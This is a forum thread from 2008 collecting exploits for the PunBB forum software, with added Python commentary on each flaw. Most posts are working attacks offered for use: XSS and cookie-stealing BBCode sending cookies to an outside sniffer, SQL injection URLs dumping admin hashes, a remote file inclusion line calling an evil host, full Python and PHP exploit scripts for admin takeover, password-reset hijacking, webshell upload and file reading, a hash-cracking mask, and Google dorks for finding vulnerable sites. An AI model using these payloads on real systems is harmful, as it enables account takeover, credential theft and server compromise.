Forums [PunBB vulnerability overview]

Discussion in 'CMS/forum vulnerabilities' started by ettee, 20 Jan 2008.

  1. ettee

    PunBB <= 1.2.14 Remote Code Execution Exploit
    PunBB version <= 1.2.2 Authentication Bypass Exploit
    ShAnKaR: multiple PHP application poison NULL byte vulnerability
    PunBB 1.2.4 (change_email) SQL Injection Exploit


    1.2.11
    PHP:
     index.php&req_subject=test&req_message=test"><script>alert(1);</script>  
    <= 1.2.16 (moderate.php)
    PHP:
    preg_match('/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/', $_GET['get_host']) // pattern is not anchored (no ^ ... $), so an IP followed by HTML still matches
    moderate.php?get_host=1.1.1.1<script>alert(1)</script>
    <= 1.2.15 (message_popup.php) XSS code vulnerability
    PHP:
    <?php echo $lang_pms['Popup new'], $return['sender'], $lang_pms['Popup subj'], $return['subject'] ?><br><?php echo $lang_pms['Popup send'], format_time($return['posted']) ?>
    <= 1.2.13 SQL Injection
    PHP:
    search.php?action=search&keywords=hello&author=&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1&result_list[< UNION SQL QUERY >/*]&1763905137=1&1121320991=1
    dork: warning: ini_get has been

    Remote File Inclusion in forum PunBB 1.1.2 >> 1.1.5
    PHP:
     include/common.php?pun_root=http://www.host_evil.com/cmd?&=id  
    PunBB <= 1.2.4 - change email to become admin exploit

    Code:
    #!/usr/bin/python
    #######################################################################
    #  _  _                _                     _       ___  _  _  ___ 
    # | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
    # | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
    # |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
    #
    #######################################################################
    #         Proof of concept code from the Hardened-PHP Project 
    #######################################################################
    #
    #                           -= PunBB 1.2.4 =-
    #                   change_email SQL injection exploit
    #
    #  user-supplied data within the database is still user-supplied data
    #
    #######################################################################
    
    import urllib
    import getopt
    import sys
    import string
    
    __argv__ = sys.argv
    
    def banner():
        print "PunBB 1.2.4 - change_email SQL injection exploit"
        print "Copyright (C) 2005 Hardened-PHP Project\n"
    
    def usage():
        banner()
        print "Usage:\n"
        print "   $ ./punbb_change_email.py [options]\n"
        print "        -h http_url   url of the punBB forum to exploit"
        print "                      f.e. http://www.forum.net/punBB/"
        print "        -u username   punBB forum useraccount"
        print "        -p password   punBB forum userpassword"
        print "        -e email      email address where the admin level activation email is sent"
        print "        -d domain     catch all domain to catch \"some-SQL-Query\"@domain emails"
        print ""
        sys.exit(-1)
    
    def main():
        try:
            opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
        except getopt.GetoptError:
            usage()
    
        if len(__argv__) < 10:
            usage()
    
        username = None
        password = None
        email = None
        domain = None
        host = None
        for o, arg in opts:
            if o == "-h":
                host = arg
            if o == "-u":
                username = arg
            if o == "-p":
                password = arg
            if o == "-e":
                email = arg
            if o == "-d":
                domain = arg
    
        # Printout banner
        banner()
    
        # Check if everything we need is there
        if host == None:
            print "[-] need a host to connect to"
            sys.exit(-1)
        if username == None:
            print "[-] username needed to continue"
            sys.exit(-1)
        if password == None:
            print "[-] password needed to continue"
            sys.exit(-1)
        if email == None:
            print "[-] email address needed to continue"
            sys.exit(-1)
        if domain == None:
            print "[-] catch all domain needed to continue"
            sys.exit(-1)

        # Retrieve cookie
        params = {
            'req_username' : username,
            'req_password' : password,
            'form_sent' : 1
        }
    
        wclient = urllib.URLopener()
    
        print "[+] Connecting to retrieve cookie"
    
        req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
        info = req.info()
        if 'set-cookie' not in info:
            print "[-] Unable to retrieve cookie... something is wrong"
            sys.exit(-3)
        cookie = info['set-cookie']
        cookie = cookie[:string.find(cookie, ';')]
        print "[+] Cookie found - extracting user_id"
        user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
        print "[+] User-ID: %d" % (int(user_id))
        wclient.addheader('Cookie', cookie);
    
        email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
        append = 'group_id=\'1'
        email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
    
        params = {
            'req_new_email' : email,
            'form_sent' : 1
        }

        print "[+] Connecting to request change email"
        req = wclient.open(host + "profile.php?action=change_email&id=" + user_id,
                           urllib.urlencode(params))
    
        print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
    
    if __name__ == "__main__":
        main()
    PunBB BBCode URL Tag Script Injection Vulnerability
    PHP:
     [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://baba/sniffer.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


    -punbb_users
    --id
    --group_id
    --username
    --password


    Dork example:
    intext:"Powered by PunBB 1.2.5"
    intext:"Powered by PunBB" -"1.2.6" -"1.2.7"
    intext:"Powered by PunBB 1.1.0...7" OR "Powered by PunBB 1.2.0...7"
    intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog -inurl:"page=info" -inurl:"page=all" -inurl:"showtopic"
    intext:"Powered by PunBB" -"1.2.6" -"1.2.7" inurl:index.php -blog
     
    #1 ettee, 20 Jan 2008
    Last edited: 20 Jan 2008
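The moderate.php `get_host` check quoted in post #1 fails because its pattern carries no `^`/`$` anchors, so `1.1.1.1<script>alert(1)</script>` merely contains a match and passes. The Python below is an added example, not code from the post or from PunBB: the pattern is the one quoted above, while the function names and the two sample inputs are mine.

```python
import html
import ipaddress
import re

# Constructed inputs: a bare address and the payload quoted in the post.
BENIGN = "1.1.1.1"
PAYLOAD = "1.1.1.1<script>alert(1)</script>"

# The pattern from the quoted moderate.php check, transcribed as-is: no ^ or $ anchors.
IP_PATTERN = re.compile(r"[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}")


def looks_like_ip_unanchored(value: str) -> bool:
    """The weak check: a search only asks whether an IPv4-looking substring exists
    somewhere in the value, so anything appended after it passes."""
    return IP_PATTERN.search(value) is not None


def looks_like_ip_anchored(value: str) -> bool:
    """Same pattern anchored at both ends (PHP: /^...$/), so trailing HTML fails."""
    return IP_PATTERN.fullmatch(value) is not None


def is_valid_ipv4(value: str) -> bool:
    """Stronger: parse it, which additionally rejects out-of-range octets like 999.1.1.1."""
    try:
        ipaddress.IPv4Address(value)
    except ipaddress.AddressValueError:
        return False
    return True


def safe_get_host(value: str) -> str:
    """What moderate.php should do with get_host: validate the input, and still
    escape it before it is echoed into the page. Raises ValueError on bad input."""
    if not is_valid_ipv4(value):
        raise ValueError("get_host must be a bare IPv4 address")
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for value in (BENIGN, PAYLOAD, "999.1.1.1"):
        print(repr(value), looks_like_ip_unanchored(value),
              looks_like_ip_anchored(value), is_valid_ipv4(value))
```

Anchoring alone is not enough (`999.1.1.1` still matches the anchored pattern), and even a validated value should be escaped on output, since the check and the echo live in different places and drift apart.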
  2. ettee

    Cryptographic attack

    Hashing algorithm used in the cookie:
    PHP:
    md5($cookie_seed.md5(password))
    Example:
    md5($cookie_seed.md5("123"))="beae53ed5f767f344b03646a1aa5b16e"
    The resulting string consists only of characters from the set "abcdef1234567890".

    Cookie generation scheme:
    PHP:
    md5($cookie_seed.$pun_user['password'])
    $pun_user['password'] - the user's password hash, sha1() or md5().
    $cookie_seed - the salt ("identical" for all users).

    Default algorithm for $cookie_seed (config.php):
    PHP:
    function pun_hash($str)
    {
        if (function_exists('sha1'))    // Only in PHP 4.3.0+
            return sha1($str);
        else if (function_exists('mhash'))    // Only if Mhash library is loaded
            return bin2hex(mhash(MHASH_SHA1, $str));
        else
            return md5($str);
    }
    PasswordPro has no module for the md5(salt.md5(pass)) algorithm, so we use the "mask attack" method:
    "Character set" for the custom mask: ?1: abcdef1234567890
    Mask: ?1?1?1?1?1?1?1?1202cb962ac59075b964b07152d234b70
    Length: 40-40

    ===
    UPDATE: PasswordPro now has the corresponding module
     
    #2 ettee, 20 Jan 2008
    Last edited by a moderator: 3 Sep 2008
  3. Solide Snake

    PunBB <= 1.2.16 Blind Password Recovery Exploit


    http://www.milw0rm.com/exploits/5165

    Code:
    <?php
    /**
     * Original : http://sektioneins.de/advisories/SE-2008-01.txt
     * Thanks to Stefan Esser, here's the exploit.
     *
     * Team : EpiBite
     * firefox, petit-poney, thot
     * Nous tenons a remercier nos mamans et papas respectifs.
     * Let's get a fu*** coffee !
     */
    
    // conf
    define('URL', 'http://localhost/punbb_1-2-16_fr/upload');	// base url
    define('EMAIL', '[email protected]');				// your email
    define('LOGIN', 'login_x');					// your login
    define('PASS', '620553.8I73');					// your pass
    // Exploit
    printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL);
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL,
    URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer');
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    $s = curl_exec($h);
    preg_match('/profile\.php\?id=([0-9]*)">([^<]*)</', $s, $m);
    define('ADMIN', $m[2]);
    preg_match('/<td class="tcr">([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m);
    if (count($m))
      define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1]));
    else
      define('DATE', time() - 86400); // just in case the forum or account has just been created
    printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE);
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
    // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($h, CURLOPT_HEADER, 1);
    curl_setopt($h, CURLOPT_POST, 1);
    curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
    						       'req_email='.urlencode(EMAIL),
    						       'request_pass=Envoyer')));
    preg_match('/mailto:([^"]*)"/', curl_exec($h), $m);
    define('ADMIN_MAIL', $m[1]); // Admin email (normally obtained automatically; set it manually if there is a problem)
    printf("Admin mail : %s\n--\n", ADMIN_MAIL);
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2');
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
    curl_setopt($h, CURLOPT_COOKIE,
    'punbb_cookie='.rawurlencode(serialize(array(0 => 2, 1 =>
    md5('bite')))));
    curl_setopt($h, CURLOPT_HEADER, 1);
    curl_setopt($h, CURLOPT_POST, 1);
    curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
    						       'req_email='.urlencode(ADMIN_MAIL),
    						       'request_pass=Envoyer')));
    $s = curl_exec($h);
    preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
    $c = unserialize(urldecode($m[1]));
    define('MD5_NOT_LOGGUED', $c[1]);
    printf("Md5 not loggued : %s\n--\n", MD5_NOT_LOGGUED);
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=in');
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($h, CURLOPT_HEADER, 1);
    // curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128');
    curl_setopt($h, CURLOPT_POST, 1);
    curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1',
    						       'redirect_url=index.php',
    						       'req_username='.LOGIN,
    						       'req_password='.PASS)));
    $s = curl_exec($h);
    preg_match('/Set-Cookie:.*punbb_cookie=([^;]*)\;/', $s, $m);
    $c = unserialize(urldecode($m[1]));
    define('MD5_LOGGUED', $c[1]);
    printf("Md5 loggued : %s\n--\n", MD5_LOGGUED);
    define('PASS_MD5ED', sha1(PASS));
    $chars = array('/', '-', "\\", '|');
    for ($p = 0; $p < 86400 * 2; $p++)
    {
      if (!($p % 300))
        echo $chars[($p / 300) % 4]."\r";
      if (strcmp(MD5_LOGGUED, md5(substr(md5((int)(DATE + $p)),
    -8).PASS_MD5ED)) == 0)
        {
          define('SEED', substr(md5(DATE + $p), -8));
          break;
        }
    }
    printf("Seed : %s\n--\n", SEED);
    for ($p = 0; $p < 1000000; $p++)
    {
      if (!($p % 300))
        echo $chars[($p / 300) % 4]."\r";
      mt_srand((double)$p);
      if (strcmp(md5(SEED.random_pass(8)), MD5_NOT_LOGGUED) == 0)
        {
          define('SRAND', $p);
          break;
        }
    }
    printf("SRAND : %s\n--\n", SRAND);
    mt_srand(SRAND);
    random_pass(8);
    printf("New password : %s\n--\n", random_pass(8));
    $url = URL.'/profile.php?id=2&action=change_pass&key='.random_pass(8); // id is set to '2' (the admin's id, but you can change your target)
    $h = curl_init();
    curl_setopt($h, CURLOPT_URL, $url);
    curl_setopt($h, CURLOPT_RETURNTRANSFER, 1);
    curl_exec($h);
    function random_pass($len)
    {
      $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
      $password = '';
      for ($i = 0; $i < $len; ++$i)
        $password .= substr($chars, (mt_rand() % strlen($chars)), 1);
      return $password;
    }
    
    # milw0rm.com [2008-02-21]
     
    #3 Solide Snake, 21 Feb 2008
    Last edited by a moderator: 3 Sep 2008
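Posts #2 and #3 both come down to recovering the same secret, `$cookie_seed`: post #2 cracks md5(seed . md5(pass)) as a plain MD5 with an 8-character hex mask, post #3 derives the seed from the forum's install time and walks the timestamps. The Python below is an added example, not the posts' code and not PunBB's; it runs both searches against a constructed target. The seed derivation `substr(md5(time()), -8)` is taken from the exploit in post #3; the `mt_rand` replay that the exploit performs afterwards is not reproduced; the short seed length and the install timestamp used in the demo are constructed values.

```python
import hashlib
import itertools

HEX = "0123456789abcdef"  # the character set post #2 feeds to the mask


def stored_hash(password: str, algo: str = "sha1") -> str:
    """pun_hash(): sha1 when available, md5 otherwise. Post #2's example uses md5('123')."""
    return hashlib.new(algo, password.encode()).hexdigest()


def cookie_hash(seed: str, password_hash: str) -> str:
    """The cookie scheme quoted in post #2: md5($cookie_seed . $pun_user['password'])."""
    return hashlib.md5((seed + password_hash).encode()).hexdigest()


def seed_from_install_time(install_ts: int) -> str:
    """Seed derivation that post #3's exploit searches for: substr(md5(time()), -8)."""
    return hashlib.md5(str(install_ts).encode()).hexdigest()[-8:]


def recover_seed_by_mask(target: str, password_hash: str, seed_len: int, charset: str = HEX):
    """Post #2's mask attack: an unknown prefix of seed_len chars from charset in
    front of a known suffix (the password hash). A real seed is 8 hex chars, i.e.
    16**8 candidates, which is tractable for an offline MD5 mask attack; seed_len
    is a parameter only so the demo stays small. Returns the seed or None."""
    for candidate in itertools.product(charset, repeat=seed_len):
        seed = "".join(candidate)
        if cookie_hash(seed, password_hash) == target:
            return seed
    return None


def recover_seed_by_time(target: str, password_hash: str, start_ts: int, window: int):
    """Post #3's approach: the seed is md5 of the install timestamp, so walk every
    second of the suspected install window (the exploit uses two days from the
    oldest registration date) and return (seed, timestamp) on a match, else None."""
    for ts in range(start_ts, start_ts + window):
        seed = seed_from_install_time(ts)
        if cookie_hash(seed, password_hash) == target:
            return seed, ts
    return None


if __name__ == "__main__":
    # Constructed demo values: a 3-char seed and an install time inside a one-day window.
    h_md5 = stored_hash("123", "md5")
    print("mask:", recover_seed_by_mask(cookie_hash("a1f", h_md5), h_md5, 3))
    h_sha1 = stored_hash("123")
    install = 1200004321
    target = cookie_hash(seed_from_install_time(install), h_sha1)
    print("time:", recover_seed_by_time(target, h_sha1, 1200000000, 86400))
```

Both searches need one cookie value for an account whose password you know (your own), which is exactly why the seed, not the password, is the weak link: once it is known, every other user's cookie is md5(seed . hash) and can be forged from a hash dump or cracked offline.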
  4. Goudini

    PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitrary file upload

    PHP:
    <?php
    # PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitrary file upload
    # h3ck.[rv.ua], 2008

    $host = 'localhost';                 # host
    $path = '/punbb/';                   # path to the forum
    $file_type = 'image/gif';
    $file_name = 'sh1.gif.php';          # name of the new file
    $file_code = '<?php phpinfo(); ?>';  # code that will be executed
    $cookie = 'punbb_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A32%3A%220b9ca83006024ac122e2b1c459c0804f%22%3B%7D'; # does not work without authentication..
    $file_content = base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='); # a 1x1 GIF, so the upload passes the image check
    $post_data = <<<POST
    ------------9cYrkcaQ3YTUyzCSnL8xD2
    Content-Disposition: form-data; name="form_sent"

    1
    ------------9cYrkcaQ3YTUyzCSnL8xD2
    Content-Disposition: form-data; name="imagefile"; filename="$file_name"
    Content-Type: $file_type

    ${file_content}${file_code}
    ------------9cYrkcaQ3YTUyzCSnL8xD2
    Content-Disposition: form-data; name="uploadimg"

    Submit
    ------------9cYrkcaQ3YTUyzCSnL8xD2--

    POST;
    $post_len = strlen($post_data);
    $req = <<<REQ
    POST http://${host}${path}uploadimg.php?subpage=upload HTTP/1.0
    User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)
    Host: $host
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: uk-UA,uk;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Cookie: $cookie
    Content-Length: $post_len
    Content-Type: multipart/form-data; boundary=----------9cYrkcaQ3YTUyzCSnL8xD2
    Connection: Close

    $post_data
    REQ;
    $fp = fsockopen($host, 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr ($errno)<br />\n";
    } else {
        echo "Sending... <pre>$req</pre>\n";
        fwrite($fp, $req);
        while (!feof($fp)) { echo fgets($fp); }
        fclose($fp);
    }
    ?>
     
    #4 Goudini, 17 Jun 2008
    Last edited by a moderator: 3 Sep 2008
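The upload exploit above works because the mod keeps the client-supplied file name and only needs the body to start like a GIF, so `sh1.gif.php` with a GIF header in front of the PHP is stored as-is and then executed. As an added example, not from the post or from the PunBB mod, here is the check a server-side upload handler should make, run over three constructed inputs, one of them the post's polyglot; the magic-byte table and the function names are mine.

```python
import hashlib
import os

# Constructed sample uploads. POLYGLOT mirrors the post's payload: the 1x1 GIF
# header the script prepends, PHP after it, and a double extension.
GIF_HEADER = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
POLYGLOT = ("sh1.gif.php", GIF_HEADER + b"<?php phpinfo(); ?>")
PLAIN_GIF = ("avatar.gif", GIF_HEADER + b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
FAKE_PNG = ("pic.png", b"not really a png")

# Final extension -> magic bytes the body must start with
ALLOWED = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
# Checked against every extension in the name, not just the last one: with Apache's
# AddHandler-style configuration "x.php.gif" can be handed to PHP as well.
EXECUTABLE = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}


def check_upload(filename: str, data: bytes):
    """Returns (ok, reason). The checks the vulnerable mod lacked: inspect every
    extension in the client-supplied name, allowlist the final one, require the body
    to carry the magic bytes of that type, and refuse script markers inside it."""
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = ["." + p for p in parts[1:]]
    if any(e in EXECUTABLE for e in exts):
        return False, "executable extension present: " + base
    ext = exts[-1]
    if ext not in ALLOWED:
        return False, "extension not allowed: " + ext
    if not data.startswith(ALLOWED[ext]):
        return False, "body does not match " + ext
    if b"<?" in data or b"<script" in data.lower():
        return False, "script marker inside image body"
    return True, "ok"


def stored_name(original: str, data: bytes) -> str:
    """Never keep the client's name: store under a content hash plus the validated
    extension. Raises ValueError when check_upload rejects the file."""
    ok, reason = check_upload(original, data)
    if not ok:
        raise ValueError(reason)
    ext = "." + original.lower().rsplit(".", 1)[1]
    return hashlib.sha256(data).hexdigest()[:16] + ext


if __name__ == "__main__":
    for name, body in (POLYGLOT, PLAIN_GIF, FAKE_PNG):
        print(name, check_upload(name, body))
```

The magic-byte test on its own is not a defence (the post's payload satisfies it); what closes the hole is refusing any executable extension anywhere in the name, renaming on the server side, and serving the upload directory with script execution disabled.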
  5. OptimaPrime

    PunBB Migration Tool 1.4.0


    Download URL:
    Code:
    http://punbb.er.cz/czmirror/PunBB_Migration_Tool-1.4.0.tar
    Bug Type: Local File Inclusion

    Bug In:
    Code:
    converters/index.php
    Vulnerable Code (excerpt; the opening if and the closing brace are not shown):
    Code:
    <?php
    // Load a specific page
    else {
        if (file_exists($_GET['page'] . '.php'))
            include $_GET['page'] . '.php';
        else
            include 'settings.php';
    ?>
    Proof Of Concept: http://www.website.com/[path]/converters/index.php?page=/etc/passwd%00
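The quoted converters/index.php takes `$_GET['page']`, appends `.php` and includes the result; the PoC's `%00` cuts the appended extension off and the leading `/` escapes the converters directory. The Python below is an added example, not the tool's code: it models the vulnerable resolution (including the NUL truncation that PHP before 5.3.4 performed on file paths) next to an allowlisted, root-confined version. The same `...%00` pattern appears later in this thread against the PMS mod's `pun_user[language]`. Apart from `settings`, the names in `ALLOWED_PAGES` are assumptions, and the base directory used when running it is constructed.

```python
import os
from urllib.parse import parse_qs

# Assumption: 'settings' comes from the quoted code, the other two are placeholders
# for whatever converter scripts the directory really contains.
ALLOWED_PAGES = {"settings", "converter_a", "converter_b"}


def page_param(query: str) -> str:
    """The value PHP puts in $_GET['page']: %00 decodes to a real NUL byte."""
    return parse_qs(query, keep_blank_values=True).get("page", [""])[0]


def vulnerable_include_path(page: str, base: str) -> str:
    """Models the quoted converters/index.php: the user value is used as a path and
    '.php' is appended. PHP before 5.3.4 handed the string to C functions that stop
    at the first NUL, so 'x\\0.php' was opened as 'x'; that truncation is reproduced.
    An absolute page value, or one containing '../', leaves the converters directory."""
    candidate = page + ".php"
    nul = candidate.find("\x00")
    if nul != -1:
        candidate = candidate[:nul]
    if os.path.isabs(candidate):
        return candidate
    return os.path.join(base, candidate)


def safe_include_path(page: str, base: str):
    """Hardened form: allowlist the page name, build the path from a fixed root, and
    confirm the resolved path still lives inside that root. Returns None on rejection."""
    if page not in ALLOWED_PAGES:
        return None
    root = os.path.realpath(base)
    target = os.path.realpath(os.path.join(root, page + ".php"))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


if __name__ == "__main__":
    base = "/srv/www/migration/converters"  # constructed
    for q in ("page=/etc/passwd%00", "page=../../../../etc/passwd%00", "page=converter_a"):
        p = page_param(q)
        print(q, "->", vulnerable_include_path(p, base), "|", safe_include_path(p, base))
```

The allowlist is the real fix; the realpath containment check is a second line for the day someone adds a page name with a slash in it. Neither depends on the NUL fix in PHP 5.3.4, which only removes the extension-stripping trick, not the traversal.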
     
  6. Doom123

    PunBB 1.2.17 SQL injection & File reader

    Code:
    v1.2.17 punbb.ru rev87
    /message_popup.php
    message_popup.php?id=0+UNION+SELECT+user_id,concat_ws(0x3a,table_name),2,3+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+<table number>,1
    work out the table prefix from the table names.
    -----------------------------------SQL<
    /message_popup.php?id=0+union+select+user_id,username,3,password+from+[PREFIX]users+where+id=2
    get the admin's username and hash.
    -----------------------------------SQL<
    download.php
    /download.php?aid=9+union+select+1,file,3,user_id,null,1
    read files on the host
    -----------------------------------SQL<

    user_id - your id on the forum, i.e. the account you logged in with

    By @Fatal@ aka Doom123

    PHP:
    <?php

    /**
     * @author @Fatal@
     * @copyright HWT©2008
     *
     *   PunBB expl0it
     *
     * The vulnerability exists because of insufficient filtering
     * of input data in download.php!
     *
     * The author bears no responsibility for the use of this script!
     * Use it at your own risk!
     *
     *  Vulnerability found by @Fatal@.
     */

    if (isset($_POST['start']))
    {
      if (!empty($_POST['login']) && !empty($_POST['pass']) && !empty($_POST['host']) && !empty($_POST['id']) && !empty($_POST['path']))
        {
            define("_HOST", $_POST['host']);
            define("_PORT", 80);

            // Collect the Set-Cookie headers of a response into one Cookie: request header
            function cookie($ans)
            {
                $head = 'Cookie:';
                foreach ($ans as $val)
                {
                    if (preg_match('#Set-Cookie:(.+)#is', $val, $pock))
                    {
                        $co = explode(';', $pock['1']);
                        $head .= ' ' . trim($co[0]) . ';';
                    }
                }
                return $head . " \r\n";
            }

            // Build an application/x-www-form-urlencoded body
            function Prepare_POST_array($arr)
            {
                $out = '';
                foreach ($arr as $key => $line)
                {
                    if ($out == '')
                        $out .= $key . '=' . urlencode($line);
                    else
                        $out .= '&' . $key . '=' . urlencode($line);
                }

                return $out . "\r\n\r\n";
            }

            // Raw HTTP request over a socket: GET when $param is empty, POST otherwise
            function post_query($path, $param, $cook = '', $AnswerFlag = true)
            {
                $out = "POST " . $path . " HTTP/1.1\r\n";

                if ($param == array())
                {
                    $out = "GET " . $path . " HTTP/1.1\r\n";
                    $data = "";
                } else
                    $data = Prepare_POST_array($param);

                $fp = fsockopen(_HOST, _PORT, $errno, $errstr, 30);
                if (!$fp) return false;

                $out .= "Host: " . _HOST . "\r\n";
                $out .= "Content-Type: application/x-www-form-urlencoded; charset=windows-1251\r\n";
                $out .= "Content-Length: " . strlen($data) . "\r\n";
                $out .= "User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)\r\n";
                $out .= $cook;
                $out .= "Connection: Close\r\n\r\n";
                $out .= $data;

                fwrite($fp, $out);
                if ($AnswerFlag)
                {
                    while (!feof($fp))
                    {
                        $answer[] = fgets($fp, 1024);
                    }
                } else
                    $answer = true;

                fclose($fp);
                return $answer;
            }

            // Log in with the attacker's own account; the injection needs a valid session
            $array = array(
                'form_sent' => '1',
                'redirect_url' => 'index.php',
                'req_username' => $_POST['login'],
                'req_password' => $_POST['pass'],
            );

            $ans = post_query($_POST['path'].'login.php?action=in', $array);
            $a = cookie($ans);

      if ($_POST['method'] != 2)
      {
          if (!empty($_POST['nid']))
          {
            if (empty($a))
              $error = 'Wrong login or password';

            else {
            // First try without a table prefix
            $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3,'.$_POST['id'].',null,6+FROM+users+WHERE+id+like+'.$_POST['nid'];

            $ans2 = post_query($page, array(), $a);
            $str = implode('', $ans2);

            if (strrpos($str, "doesn't exist (Errno: 1146)") !== false)
            {
              // No bare "users" table: take the database name from the MySQL error,
              // then read the real prefix out of information_schema
              preg_match("# Table '(.+?)\.users' doesn't exist \(Errno: 1146\)#is", $str, $pock);
              $hex = '0x'.bin2hex($pock[1]);
              $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,table_name,3,'.$_POST['id'].',null,6+FROM+information_schema.columns+WHERE+table_schema+like+'.$hex;
              $ans3 = post_query($page, array(), $a);
              $str = implode('', $ans3);
              preg_match('#PunBB reported</strong>: (.+?)attachments - this file does not exist#is', $str, $pock);
              $pref = isset($pock[1]) ? $pock[1] : $_POST['prefix'];
              $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,password,3,'.$_POST['id'].',null,6+FROM+'.$pref.'users+WHERE+id+like+'.$_POST['nid'];
              $ans2 = post_query($page, array(), $a);
              $str = implode('', $ans2);
            }

            // The injected column is echoed back inside the "file does not exist" error
            preg_match('#PunBB reported</strong>: (.{0,40}) - this file does not exist#is', $str, $pock);
            echo "<center><b><h1>User hash:".$pock[1]."</h1></b></center>";
            }
          } else
              $error = "Enter all the data";
        } else {
          if (!empty($_POST['file']))
          {
            if (empty($a))
              $error = 'Wrong login or password';

            else {
            // Inject the file name into the attachment path, so download.php serves that file
            $page = $_POST['path'].'download.php?aid=9999+UNION+SELECT+1,"'.$_POST['file'].'",3,'.$_POST['id'].',null,6';
            $ans2 = post_query($page, array(), $a);

            // Skip the response headers and print the file body line by line
            $i = 11;
            while (array_key_exists($i, $ans2))
            {
              echo htmlspecialchars($ans2[$i]).'<br>';
              $i++;
            }
            }
        } else
          $error = "Enter all the data";

      }
        } else
        $error = "Enter all the data";
    }

    if (isset($error) || !isset($_POST['start']))
    {
      $error = isset($error) ? $error : '';
      echo '<center>'.$error."<BR><BR><b>PunBB Expl0it</b><br><br>";
      echo '<form method="post">';
      echo 'Host: <input type="text" name="host"><br>';
      echo 'Path: <input type="text" name="path"><br>';
      echo 'Prefix: <input type="text" name="prefix"><br>';
      echo 'Login: <input type="text" name="login"><br>';
      echo 'Password: <input type="text" name="pass"><br>';
      echo 'Y.id: <input type="text" name="id"><br>';
      echo 'V.id: <input type="text" name="nid"><br>';
      echo 'File: <input type="text" name="file"><br>';
      echo 'Method: <select name=method><option value=1>Extract hash</option>';
      echo '<option value=2>View file</option></select><br>';
      echo '<input type="submit" name="start"></form>';
      echo '<br><br>Y.id - id of your user';
      echo '<br>V.id - id of the victim (must be filled in for the first method)';
      echo '<br>File - path to the file (for the second method)';
      echo '<br>Path - forum directory, e.g. /path/  (if the forum is not in a subdirectory enter /)';
      echo '<br>Prefix - usually detected automatically, but if access is insufficient your value is used';
      echo '<br><BR><BR>C0ded by @Fatal@ For HW Team</center>';
    }
    ?>
     
    #6 Doom123, 23 Jul 2008
    Last edited: 30 Jul 2008
